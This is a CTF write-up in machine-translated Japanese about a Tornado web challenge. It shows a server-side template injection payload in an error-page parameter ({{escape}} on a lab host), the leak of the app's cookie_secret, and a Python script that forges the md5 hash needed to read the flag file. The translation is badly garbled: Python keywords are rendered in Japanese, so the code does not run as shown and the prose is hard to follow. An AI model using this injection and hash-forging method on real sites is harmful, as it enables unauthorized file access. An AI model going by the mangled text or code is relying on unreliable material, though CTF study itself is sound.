1. 3つのヒントを与えました
フラグに/ fllllllllllllagこちら
これら二つのことを竜巻+レンダリング、明らかにPythonのウェブ
フラグへのプロンプト]フォルダに従って、訪問するパスを追加し、私はアクセスすることは不可能、ページにジャンプすること間違いました
ここで、存在は、テンプレートの注入ではなかったことを疑うようになりました
入力データは、例えば、コードが実行されるとして扱われ、{1} + {1} 2エコー戻り、もちろん、通常の状況めったに。一般的な関数やキーワードが実行されます
最初に試します
公式サイトでは、おそらく、これらの機能を少し回し
一つ一つを試してみてください
最初のエスケープは、直接行いました
http://9cc83977-4b02-44c3-93d1-b1f6d026f845.node1.buuoj.cn/error?msg={{escape}}
ここでプロンプトが、私たちはクッキーを必要とします
参考WP、シェフが説明しました
次に、ヒントヒントに従ってハッシュ値を計算します
!# - * -コーディング:UTF-8 - * -
インポートhashlibの
デフMD5(S):
MD5 = hashlib.md5()
md5.update(S)
(md5.hexdigest戻る)
DEFファイルハッシュ():
ファイル名=「/ fllllllllllllag '
cookie_secret = '01d3ae36-9d9e-44f4-b25e-405eda25b369'
プリント(MD5(cookie_secret + MD5(ファイル名)))
もし__name__ == '__main__':
ファイルハッシュ()
742267cca0cd702fac6bbaeb947cd61e、アクセス中フラグを持参
フラグ:フラグ{94b1f826-b51b-4822-986f-bc718c19560b}
参考記事:
http://ch.vksec.com/2017/06/tornado.html
https://blog.csdn.net/weixin_44677409/article/details/94410580
https://tornado.readthedocs.io/en/latest/web.html#tornado.web.RequestHandler
https://www.kancloud.cn/kancloud/python-basic/41712
https://www.cnblogs.com/cimuhuashuimu/p/11544455.html